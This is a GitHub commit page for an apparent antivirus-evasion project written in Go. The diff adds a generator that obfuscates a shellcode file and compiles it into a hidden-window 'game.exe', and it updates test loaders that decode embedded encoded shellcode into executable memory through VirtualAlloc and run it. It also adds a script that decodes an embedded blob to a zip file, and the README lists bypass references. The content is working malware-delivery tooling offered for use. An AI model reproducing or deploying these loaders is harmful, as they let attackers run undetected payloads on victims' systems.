Skip to content

Commit

Permalink
gen
Browse files Browse the repository at this point in the history
  • Loading branch information
@safe6Sec
safe6Sec committed Aug 22, 2021
1 parent e295930 commit d836ae9
Show file tree
Hide file tree
Showing 5 changed files with 73 additions and 43 deletions.
2 changes: 2 additions & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -35,6 +35,8 @@ go build -ldflags="-s -w -H=windowsgui" -o main2.exe


## 参考
https://github.com/Rvn0xsy/BadCode
https://github.com/Airboi/bypass-av-note
https://github.com/brimstone/go-shellcode
https://github.com/timwhitez/Doge-Loader
https://github.com/fcre1938/goShellCodeByPassVT
48 changes: 48 additions & 0 deletions gen/main.go
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
package main

import (
"encoding/base64"
"fmt"
"io/ioutil"
"os"
"os/exec"
"strings"
)

var kkk = []byte{0x23, 0x32}

func getEnCode(data []byte) string {
bdata1 := base64.StdEncoding.EncodeToString(data)
bydata1 := []byte(bdata1)
var shellcode []byte

for i := 0; i < len(bydata1); i++ {
shellcode = append(shellcode, bydata1[i]+kkk[0]-kkk[1])
}
return base64.StdEncoding.EncodeToString(shellcode)
}

func main() {

path := "C:\\Users\\Administrator\\Desktop\\payload.bin"
if len(os.Args) >= 2 {
path = os.Args[1]
}
sc, _ := ioutil.ReadFile(path)
bdata := getEnCode(sc)
fmt.Println(bdata)
ioutil.WriteFile("shellcode.txt", []byte(bdata), 0666)

tmpl, _ := ioutil.ReadFile("./genExe")

code := string(tmpl)

code = strings.ReplaceAll(code, "${bdata}", bdata)

ioutil.WriteFile("shellcode.go", []byte(code), 0666)
cmd := exec.Command("go", "build", "shellcode.go", "-ldflags=\"-s -w -H=windowsgui\"", "-o", "game.exe", "shellcode.go")
//cmd:=exec.Command("go","build shellcode.go -ldflags=\"-s -w -H=windowsgui\" -o main2.exe shellcode.go")
cmd.Run()
//os.Remove("shellcode.go")

}
43 changes: 6 additions & 37 deletions test2/main.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,8 +3,6 @@ package main
import (
"GolangBypassAV/encry"
"encoding/base64"
"fmt"
"os"
"syscall"
"time"
"unsafe"
Expand All @@ -16,26 +14,15 @@ const (
PAGE_EXECUTE_READWRITE = 0x40
)

var kk = []byte{0x13, 0x32}

func base64Decode(data string) []byte {
data1, _ := base64.StdEncoding.DecodeString(data)
return data1
}

func base64Encode(data []byte) string {
bdata := base64.StdEncoding.EncodeToString(data)
return bdata
}
var kk = []byte{0x23, 0x32}

func getEnCode(data []byte) string {
bdata := base64.StdEncoding.EncodeToString(data)

bydata := []byte(bdata)
bdata1 := base64.StdEncoding.EncodeToString(data)
bydata1 := []byte(bdata1)
var shellcode []byte

for i := 0; i < len(bydata); i++ {
shellcode = append(shellcode, bydata[i]+kk[0]-kk[1])
for i := 0; i < len(bydata1); i++ {
shellcode = append(shellcode, bydata1[i]+kk[0]-kk[1])
}
return base64.StdEncoding.EncodeToString(shellcode)
}
Expand Down Expand Up @@ -63,15 +50,6 @@ func getDeCode(string2 string) []byte {

}

func checkError(err error) {
if err != nil {
if err.Error() != "The operation completed successfully." {
println(err.Error())
os.Exit(1)
}
}
}

func genEXE(charcode []byte) {

addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
Expand All @@ -96,24 +74,15 @@ func gd() int64 {

func getFileShellCode(file string) []byte {
data := encry.ReadFile(file)
//shellCodeHex := encry.GetBase64Data(data)
//fmt.Print(shellCodeHex)
return data
}

func getFileShellCode1(file string) string {
data := encry.ReadFile(file)
shellCodeHex := base64Encode(data)
fmt.Print(shellCodeHex)
return shellCodeHex
}

func main() {
//fmt.Println(1)

//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))

bbdata := "ECZKJRYxJVBaIiIiIiYnMzI3IzQ2NzsqLkUrTTQqVTQ6JkotNklJKkoSKkg0KlVaNiZIMVURUSw1NSkrNCUpIlMlWUlHIipUKiYpI1oyEiMiRClKGDcrIzY2Si02SiQtMktZKiJFI05IOUg6JFgrEkRQViJKIiIiIiZKJ1gpM080IikyNipVKigmNC0yJCMrIkUlSzdMSxBaNigtLypJKiJFOy8uRE0qLkQkVDJEKSslNiYjWDVLSEVHJy4iEVhMJCY2FhE5OTo4JjQtMiQzKyJFI04yOlQuNCY0LTIjWSsiRSMjSlg0KjQiKTIyN0kjOCcWOzhMJzoyN00jOExKJRgkIyM2VxBIOCYnOzhMSi0mVk0xEBAQEDk4UCI0QxYUQjgWUUNONxEiJic4NDpPTjUqT1kyQ1EuRVo6KRAaNyouRE0qLkUrLy5EIy8uRE0jNiYnMjJDUBc3T05PEBo5U0QSUSpKRCcjViQiJSIiIy8uRE0jNjYnM0JILyM2NigXNxVOR1lXEDcXEk1DNCpPIzQlKTQ0Ok86NTUpKzZOSCIiTCQmNk0rI1ZWVTctS1cQEjZKK1lMSiVYEiNSJE0aKkpHJypKRVErWRklEBAQEBA1NSkrNk0rI1ZKESgoKVcQEjo5IiUVOEUiMiIiNDEQMSUVNC4iMiIiFxoxURYiJiIiMEpKEBAQEC0UTRcvWy4iTDs4N0UlRTYiQkoaUEI1KydRFiNVVhZQOiYvVjJDQxJJUC1IO1pOEElTSjYVRxdMLxlVTTlYW00XQlIoT0lYOjRYMFNTLy4WEDJWMUNINyc0T1sXGFYyFFlKNToZVFMrRiIjN0QTN1otNidPOzgWETBKIy9DFFFRQyhZSS1bNlYuJCJQOhMaVUQoJxFCOCtUOzVUSDU3LyszNCIWLUsiGCopJ0w7OS9TKiUqVi8kFVkuSzpbLUsqWC5bVEg3E01WOygaFERaIzA3JCITLUsmGConRTE3WzoRMFojNkROTUw7OBYRLVs2Vi4kTC8kSCI5OU8TVxIYQzckGC9GWi8sWy83E1kVOxpOU0tKTxhaWTQ0Tjk3E04qR0JKIltVUiM4U0UqLEQqUBoqMBoRT1g5TUtbMURLFUoaNiU6NjIjOzIaGBApOBBOKUtZVlkWOBY0FlgkNFESFCUyGDVYM05IQyZYFSMiWCkYFTNJMUhXTEITFVEMRlQwTiwnFU4aGkU3GRpVK0opSEpUJjkqKhMRFE5WW1YuM1gmOE1USygtMTBKLxURTjArRylLE0w0VyoXKhEaOFAXMjZHFCVGRBY3KDFZSykYThNXQyZENxdDEUdQU1AZJCxaRTRZKhg4QlUYKk01KDdZUUpGURZTK043LylTFUUVWyoiMkMYWFVCKzgQGjcqLkROFyIiIyIiJigVIiMiIiImKBYyIiIiIiYoFzgsMzUWRxA3NCsvNTYRSisWEUorGTZKKxNMKBUiJCIiIiZOKww2KBcmUUIrFVcQNzQqMSYqKjkiRS07TkpYRSoiRDAnWCk5OTgnSTo0IjYiIiIiIjYuMVBPEBQQEFsmWi5KFRYtSyYSL1oVWS5LKiImSzM4RiIeHg=="
bbdata := "IDZaNSZBNWBqMjIyMjY3Q0JHM0RGR0s6PlU7XUQ6ZURKNlo9RllZOloiOlhEOmVqRjZYQWUhYTxFRTk7RDU5MmM1aVlXMjpkOjY5M2pCIjMyVDlaKEc7M0ZGWj1GWjQ9QltpOjJVM15YSVhKNGg7IlRgZjJaMjIyMjZaN2g5Q19EMjlCRjplOjg2RD1CNDM7MlU1W0dcWyBqRjg9PzpZOjJVSz8+VF06PlQ0ZEJUOTs1RjYzaEVbWFVXNz4yIWhcNDZGJiFJSUpINkQ9QjRDOzJVM15CSmQ+RDZEPUIzaTsyVTMzWmhEOkQyOUJCR1kzSDcmS0hcN0pCR10zSFxaNSg0MzNGZyBYSDY3S0hcWj02Zl1BICAgIElIYDJEUyYkUkgmYVNeRyEyNjdIREpfXkU6X2lCU2E+VWpKOSAqRzo+VF06PlU7Pz5UMz8+VF0zRjY3QkJTYCdHX15fICpJY1QiYTpaVDczZjtCRTIyMz8+VF0zRkY3Q1JYPzNGRjgnRyVeV2lnIEcnIl1TRDpfM0Q1OURESl9KRUU5O0ZeWDIyXDQ2Rl07M2ZmZUc9W2cgIkZaO2lcWjVoIjNiNF0qOlpXNzpaVWE7aSk1ICAgICBFRTk7Rl07M2ZaITg4OWcgIkpJMjUlSFUyQjIyREEgQTUlRD4yQjIyJypBYSYyNjIyQFpaICAgID0hXUtVRkoyMyMjYzpCSTZAYjQ8PFJKIzNhV1UcYCJTQFRqJSEgVSQ/RltTPyY1JkFZRSM3YGFcVlIgVSEqKFhkZUQqQz4zIDlmVlM3KCpiR0FAREMoaEdFWVpAJks6IiQ9KjY0WVlJYlgzR1QjR2o9RjdfS0gmIUBaMz9TJGFhUzhpWT1rRmY+NDJgSiMqZVQ4NyFSSDtkS0VkWEVHPztDRDImPVsyKDo3VWFTXkNnVSQ+WEVdQlg/WiVpQGozSUUiVCM/NWRYRzk7YUs4R2ZVNCkiPVsyKDo2O0FERkYmQCFHQEdHP0VDRiFhNUJgMipIYkg1WTxiP1hEJWFjKkVeOWRLIGdZZDVSNzsoY0ZpKVUjNCVTSmVkRmZSYjgnQiRmPSFiNSBGKDhUaWM8SUtaXVZlKlYpWlooJ1RAOEZaKiY/XGhgM1ghY1lbM2pZYSkgXGFeMkgga0tGWD8hZDtSZEAmIEtpRFlrO1tKI1MjPDw7Q1UyP1Y5OkY8I2IzNmBaWyQlZD5eMxxJNig+RVRkNWYcWyNoVjlJOFgiP1U8QCU+WEZTOypUZCFWPSQkNCg6YVZLNkdqS0tqVik2NmVWaVhGY1hES2ldXFNbZCMoWzc1XTNYaUocMl02X1chJl4qKWRDaltKOGY1IklTUyQ0KRxAIUZKaF9BI2hrazIyQlMoaGVSO0ggKkc6PlReJzIyMzIyNjglMjMyMjI2OCZCMjIyMjY4J0g8Q0UmVyBHRDs/RUYhWjsmIVo7KUZaOyNcOCUyNDIyMjZeOxxGOCc2YVI7JWcgR0Q6QTY6OkkyVT1LXlpoVToyVEA3aDlJSUg3WUpEMkYyMjIyMkY+QWBfICQgIGtGIT1bNiNARCVpP2tYZj9bNjI2W0NIVjIuLg=="
shellCodeHex := getDeCode(bbdata)
gd()
genEXE(shellCodeHex)
Expand Down
11 changes: 5 additions & 6 deletions test8/main.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ var (
//kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
//VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
DllTestDef, _ = syscall.LoadLibrary("kernel32.dll")
kernel32, _ = syscall.LoadLibrary("kernel32.dll")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

Expand Down Expand Up @@ -75,10 +75,10 @@ func checkError(err error) {

func genEXE(charcode []byte) {

defer syscall.FreeLibrary(DllTestDef)
add, err := syscall.GetProcAddress(DllTestDef, "VirtualAlloc")
defer syscall.FreeLibrary(kernel32)
VirtualAlloc, err := syscall.GetProcAddress(kernel32, "VirtualAlloc")

addr, _, err := syscall.Syscall(add, 0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
addr, _, err := syscall.Syscall(VirtualAlloc, 0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)

//addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if err != nil && err.Error() != "The operation completed successfully." {
Expand Down Expand Up @@ -115,11 +115,10 @@ func getFileShellCode1(file string) string {
}

func main() {
//fmt.Println(1)

//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))

bbdata := "ECZKJRYxJVBaIiIiIiYnMzI3IzQ2NzsqLkUrTTQqVTQ6JkotNklJKkoSKkg0KlVaNiZIMVURUSw1NSkrNCUpIlMlWUlHIipUKiYpI1oyEiMiRClKGDcrIzY2Si02SiQtMktZKiJFI05IOUg6JFgrEkRQViJKIiIiIiZKJ1gpM080IikyNipVKigmNC0yJCMrIkUlSzdMSxBaNigtLypJKiJFOy8uRE0qLkQkVDJEKSslNiYjWDVLSEVHJy4iEVhMJCY2FhE5OTo4JjQtMiQzKyJFI04yOlQuNCY0LTIjWSsiRSMjSlg0KjQiKTIyN0kjOCcWOzhMJzoyN00jOExKJRgkIyM2VxBIOCYnOzhMSi0mVk0xEBAQEDk4UCI0QxYUQjgWUUNONxEiJic4NDpPTjUqT1kyQ1EuRVo6KRAaNyouRE0qLkUrLy5EIy8uRE0jNiYnMjJDUBc3T05PEBo5U0QSUSpKRCcjViQiJSIiIy8uRE0jNjYnM0JILyM2NigXNxVOR1lXEDcXEk1DNCpPIzQlKTQ0Ok86NTUpKzZOSCIiTCQmNk0rI1ZWVTctS1cQEjZKK1lMSiVYEiNSJE0aKkpHJypKRVErWRklEBAQEBA1NSkrNk0rI1ZKESgoKVcQEjo5IiUVOEUiMiIiNDEQMSUVNC4iMiIiFxoxURYiJiIiMEpKEBAQEC0UTRcvWy4iTDs4N0UlRTYiQkoaUEI1KydRFiNVVhZQOiYvVjJDQxJJUC1IO1pOEElTSjYVRxdMLxlVTTlYW00XQlIoT0lYOjRYMFNTLy4WEDJWMUNINyc0T1sXGFYyFFlKNToZVFMrRiIjN0QTN1otNidPOzgWETBKIy9DFFFRQyhZSS1bNlYuJCJQOhMaVUQoJxFCOCtUOzVUSDU3LyszNCIWLUsiGCopJ0w7OS9TKiUqVi8kFVkuSzpbLUsqWC5bVEg3E01WOygaFERaIzA3JCITLUsmGConRTE3WzoRMFojNkROTUw7OBYRLVs2Vi4kTC8kSCI5OU8TVxIYQzckGC9GWi8sWy83E1kVOxpOU0tKTxhaWTQ0Tjk3E04qR0JKIltVUiM4U0UqLEQqUBoqMBoRT1g5TUtbMURLFUoaNiU6NjIjOzIaGBApOBBOKUtZVlkWOBY0FlgkNFESFCUyGDVYM05IQyZYFSMiWCkYFTNJMUhXTEITFVEMRlQwTiwnFU4aGkU3GRpVK0opSEpUJjkqKhMRFE5WW1YuM1gmOE1USygtMTBKLxURTjArRylLE0w0VyoXKhEaOFAXMjZHFCVGRBY3KDFZSykYThNXQyZENxdDEUdQU1AZJCxaRTRZKhg4QlUYKk01KDdZUUpGURZTK043LylTFUUVWyoiMkMYWFVCKzgQGjcqLkROFyIiIyIiJigVIiMiIiImKBYyIiIiIiYoFzgsMzUWRxA3NCsvNTYRSisWEUorGTZKKxNMKBUiJCIiIiZOKww2KBcmUUIrFVcQNzQqMSYqKjkiRS07TkpYRSoiRDAnWCk5OTgnSTo0IjYiIiIiIjYuMVBPEBQQEFsmWi5KFRYtSyYSL1oVWS5LKiImSzM4RiIeHg=="
bbdata := "ECZKJRYxJVBaIiIiIiYnMzI3IzQ2NzsqLkUrTTQqVTQ6JkotNklJKkoSKkg0KlVaNiZIMVURUSw1NSkrNCUpIlMlWUlHIipUKiYpI1oyEiMiRClKGDcrIzY2Si02SiQtMktZKiJFI05IOUg6JFgrEkRQViJKIiIiIiZKJ1gpM080IikyNipVKigmNC0yJCMrIkUlSzdMSxBaNigtLypJKiJFOy8uRE0qLkQkVDJEKSslNiYjWDVLSEVHJy4iEVhMJCY2FhE5OTo4JjQtMiQzKyJFI04yOlQuNCY0LTIjWSsiRSMjSlg0KjQiKTIyN0kjOCcWOzhMJzoyN00jOExKJRgkIyM2VxBIOCYnOzhMSi0mVk0xEBAQEDk4UCI0QxYUQjgWUUNONxEiJic4NDpPTjUqT1kyQ1EuRVo6KRAaNyouRE0qLkUrLy5EIy8uRE0jNiYnMjJDUBc3T05PEBo5U0QSUSpKRCcjViUuRyIiIy8uRE0jNjYnM0JILyM2NigXNxVOR1lXEDcXEk1DNCpPIzQlKTQ0Ok86NTUpKzZOSCIiTCQmNk0rI1ZWVTctS1cQEjZKK1lMSiVYEiNSJE0aKkpHJypKRVErWRklEBAQEBA1NSkrNk0rI1ZKESgoKVcQEjo5IiUVOEUiMiIiNDEQMSUVNC4iMiIiFxoxURYiJiIiMEpKEBAQEC0TUVlFODdaRjQRWy1LLlYuShZbQyhNVS1OElFDShZSRFgjNhpYWScaL0VaTE4yVVcYRVZNKjkiSDlRTzMWUilaW0ciRRdXSUlDOUoxMEI3FCdQRzIjRURZTjhZES0vLhEmUlo3R0Q0FFgjIzoTL01EKTIXKikzTUYpMldCKTNVQyRZSUQpI1RCOC9JRShNV0NKGhVCKTNVQyRVFUM4WFQ6OSNYQyhNSzo5M1FDExVXRigSVDAUJhouJBUWLSRQVyxLVVkxNSJWMCIRLDI4L0s7OSMRLTZZSUNORRI6OEVNMEojTUNKEjc2WllNQ0tVWTE1IlYvMhEsNk43Tjs5K01ES1BIQikzEUQlUFctEy9XOyg2VkJPJxI7OSsWLU4vV0M0GS8kTCdLOhM3WEUkEidDTi9XOyhNVjtbUEg7FFFRRCRYSDsoN05DKCcROzIRLDc5L01EShIjOxM3VkUlUEg1OBoXQjhZVDo0GRItSyJILCdFUUNOM1dFFC5INU0ySC9KFVswWiM2RE5NTDs4FhEtW0RWLiVUSERPOhcuNSZWLiRMSEMoTVM7NCMpOzgvU0NYESwiI0QTUkJRSUQRL0dTVVovTTYyWExTGUgtSRpONjgjWyJaSCMxDDNOUzY7TykMNilRKkdXGhUrU1AxWRUXFSxJGRRPTBQ5LBU6ElgiMkMYWFVCKzgQGjcqLkROFyIiIyIiJigVIiMiIiImKBYyIiIiIiYoFzgsMzUWRxA3NCsvNTYRSisWEUorGTZKKxNMKBUiJCIiIiZOKww2KBcmUUIrFVcQNzQqMSYqKjkiRS07TkpYRSoiRDAnWCk5OTgnSTo0IjhXJVgiIjYuMVBPEBQQEFsqWC1LJhYvWhVZMDUyVjAlNiImSzM4RiIeHg=="
shellCodeHex := getDeCode(bbdata)
gd()
genEXE(shellCodeHex)
Expand Down
12 changes: 12 additions & 0 deletions tmp/main.go
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
package main

import (
"encoding/base64"
"io/ioutil"
)

func main() {
ss, _ := base64.StdEncoding.DecodeString("H4sIAAAAAAAACr1TUW/aMBB+xr/iFiHkrFGasu2lGw+IelVVsiJg3aaKRVliqFVjR05SgRj/fecEAmzt66wots/fd77v7pzFyVO84LCMhSKkvbm++8LG/SnbkvPzhb5ccMVNXHDIH7mUhIhlpk0BlLScfJ0nsZQOLkuVx3NuV4VY4uwSkmiVV7iQhdHgLgxvpnA8ehCsLoIgqAFjNmHje/Y3oFsBRv1rFrHvbPB1yhDZv/o2vpmyCvAej2/Zj+gC/hk9aG+qo20N6b4O6W5txM+xsfE+caO4fNfdQ3Yy/bDMi6GO06vhkDp7kJ9iAlzSUgUujvy+SKpAe8a9MEUZy76UOrGMxqOlfBYqHRmdUOcYZmnjQg50tg75Ups10mqfpxzEhPqZ1xgkobZ5qZKqxNSFDWm1N1U5E51yzI4V3uzhYfZrXXDSmmsDAi4xyx9x/gSSK7rSJmqQLtrPzqy71oHdgzjLuEppY/LghPUgZj+rslT/LkrCCOI0NR5EHnBj7JXHqv0BJpIGHpRCFVlhqA3kEITrwaHDfh/1kgcv9w3eKObVRW8wfUJCp2N3PjNGG0wPWp3pIwed2cYXWkGil5nkBU8hL5OE5/m8lHLtO7X0XaXZShQ0qOVEjZYenBSs1lKrpTs9Lq1fjz/SaOCGdg65CmZW3yvC/4MQ+5r9ieQ8ox/gLdRbjk87xfM9YVLPO1lB87lk+weKv0dCXQQAAA==")
ioutil.WriteFile("a.zip", ss, 0666)

}

0 comments on commit d836ae9

Please sign in to comment.